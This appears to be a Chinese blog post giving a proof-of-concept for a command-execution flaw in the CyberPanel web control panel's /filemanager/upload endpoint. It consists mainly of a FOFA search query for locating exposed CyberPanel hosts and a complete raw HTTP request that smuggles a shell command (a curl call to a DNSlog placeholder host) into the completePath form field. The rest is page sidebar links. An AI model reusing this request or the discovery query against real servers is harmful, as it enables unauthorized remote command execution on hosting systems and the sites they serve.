CyberPanel开源Web控制面板 upload 命令执行漏洞复现及POC

CatalyzeSec2024-11-09 17:51

FOFA

复制代码 
app="CyberPanel"

POC

复制代码 
POST /filemanager/upload HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: multipart/form-data; boundary=----NewBoundary123456789
Content-Length: 338

------NewBoundary123456789
Content-Disposition: form-data; name="domainName"

<target>
------NewBoundary123456789
Content-Disposition: form-data; name="completePath"

curl http://DNSlog地址/
------NewBoundary123456789
Content-Disposition: form-data; name="file"; filename="poc.txt"

pwn
------NewBoundary123456789--

漏洞复现

相关推荐
房屋安全鉴定检测1 小时前
房屋安全鉴定报告有效期多久
安全·网络安全
心 一1 小时前
Web安全基石:深入理解与防御SQL注入漏洞
sql·安全·web安全
房屋安全鉴定检测3 小时前
房屋安全鉴定需要什么条件
安全·网络安全
FLS1684 小时前
Kali搭建sqli-labs靶场
linux·sql·安全·网络安全
不是三毛没有半5 小时前
华为USG6000v2 NAT模式下IPSEC IKE V1 实验
网络·网络安全·华为
KKKlucifer6 小时前
网络安全等级保护:等级保护工作、分级保护工作、密码管理工作三者之间的关系
网络·安全·web安全
Suckerbin8 小时前
LAMPSecurity: CTF6靶场渗透
笔记·安全·web安全·网络安全
房屋安全鉴定检测12 小时前
房屋安全鉴定注意事项
安全·网络安全
房屋安全鉴定检测12 小时前
房屋安全鉴定机构服务内容
安全·网络安全
碳水加碳水15 小时前
Java代码审计实战:XML外部实体注入(XXE)深度解析
java·安全·web安全·代码审计
热门推荐
012025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定 完整成品思路模型代码分享,全网首发高质量!!!02UV安装并设置国内源032025年数学建模国赛C题超详细解题思路04不再让Windows更新!&Edge游戏助手卸载及关闭自动更新05A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程06KGG转MP3工具|非KGM文件|解密音频072025全国大学生数学建模C题保姆级思路模型(持续更新):NIPT 的时点选择与胎儿的异常判定08UV 工具安装与国内镜像源配置指南09教你如何认证 Gemini 教育优惠的二次验证,薅个 1年的 Gemini Pro 会员10解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题